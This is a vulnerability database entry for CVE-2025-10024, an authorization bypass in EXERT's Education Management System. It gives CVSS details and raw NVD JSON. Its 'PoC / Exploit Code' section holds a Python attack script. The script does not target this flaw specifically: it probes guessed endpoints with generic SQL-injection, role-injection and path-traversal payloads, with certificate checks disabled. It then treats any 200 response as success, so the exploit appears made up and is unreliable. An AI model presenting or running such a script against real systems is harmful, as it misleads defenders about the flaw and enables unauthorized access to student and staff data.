Security Vulnerability Report
CVE-2025-10024 CVSS 7.5 HIGH

CVE-2025-10024

Published: 2026-01-22 12:15:54
Last Modified: 2026-04-15 00:35:42

Description

Authorization Bypass Through User-Controlled Key vulnerability in EXERT Computer Technologies Software Ltd. Co. Education Management System allows Parameter Injection. This issue affects Education Management System: through 23.09.2025.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

EXERT Education Management System < 23.09.2025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10024 PoC - Authorization Bypass via Parameter Injection
# Target: EXERT Education Management System
# Type: Authorization Bypass Through User-Controlled Key
import requests
import sys


def exploit_cve_2025_10024(target_url):
    """
    Exploit for CVE-2025-10024: Authorization Bypass Through User-Controlled Key

    This PoC demonstrates how an attacker can bypass authentication by
    manipulating user-controlled parameters in the Education Management System.

    Note: This is for educational and authorized testing purposes only.
    """
    print(f"[*] Target: {target_url}")
    print("[*] Exploiting CVE-2025-10024")

    # Step 1: Attempt to identify the vulnerable endpoint
    # Common endpoints in Education Management Systems
    endpoints = [
        "/admin/dashboard",
        "/student/profile",
        "/api/user/data",
        "/portal/home",
    ]

    # Step 2: Try parameter injection to bypass authorization
    # Attack vectors: manipulating user_id, role, or session parameters

    # Method 1: Direct parameter manipulation
    payload_params = [
        {"user_id": "1"},               # Try to access admin user
        {"role": "admin"},              # Try to inject admin role
        {"auth_token": "admin_token"},  # Token manipulation
    ]

    for endpoint in endpoints:
        for params in payload_params:
            try:
                # Construct the attack request
                attack_url = f"{target_url}{endpoint}"

                # Try GET request with parameter injection
                response = requests.get(
                    attack_url,
                    params=params,
                    timeout=10,
                    verify=False,
                )

                # Check for successful bypass indicators
                if response.status_code == 200:
                    # Look for sensitive data exposure
                    if any(keyword in response.text.lower()
                           for keyword in ['admin', 'student', 'grade', 'personal', 'confidential']):
                        print(f"[+] Potential successful exploit at {endpoint}")
                        print(f"[+] Payload: {params}")
                        return True
            except requests.RequestException as e:
                print(f"[-] Request failed: {e}")
                continue

    # Method 2: Try POST request with injected parameters
    post_payloads = [
        {"id": "1 OR 1=1"},          # SQL-like injection
        {"user": "admin'--"},        # Authentication bypass
        {"session": "../../admin"},  # Path traversal
    ]

    for endpoint in endpoints:
        for payload in post_payloads:
            try:
                attack_url = f"{target_url}{endpoint}"
                response = requests.post(
                    attack_url,
                    data=payload,
                    timeout=10,
                    verify=False,
                )
                if response.status_code == 200:
                    print(f"[+] POST exploit may have worked at {endpoint}")
            except requests.RequestException:
                continue

    print("[*] Exploitation attempt completed")
    print("[*] Manual verification may be required")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-10024.py <target_url>")
        print("Example: python cve-2025-10024.py http://vulnerable-site.com")
        sys.exit(1)
    target = sys.argv[1]
    exploit_cve_2025_10024(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10024", "sourceIdentifier": "[email protected]", "published": "2026-01-22T12:15:53.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in EXERT Computer Technologies Software Ltd. Co. Education Management System allows Parameter Injection.This issue affects Education Management System: through 23.09.2025."}, {"lang": "es", "value": "Vulnerabilidad de elusión de autorización a través de clave controlada por el usuario en el Sistema de Gestión Educativa de EXERT Computer Technologies Software Ltd. Co. permite la inyección de parámetros. Este problema afecta al Sistema de Gestión Educativa: hasta el 23.09.2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0002", "source": "[email protected]"}]}}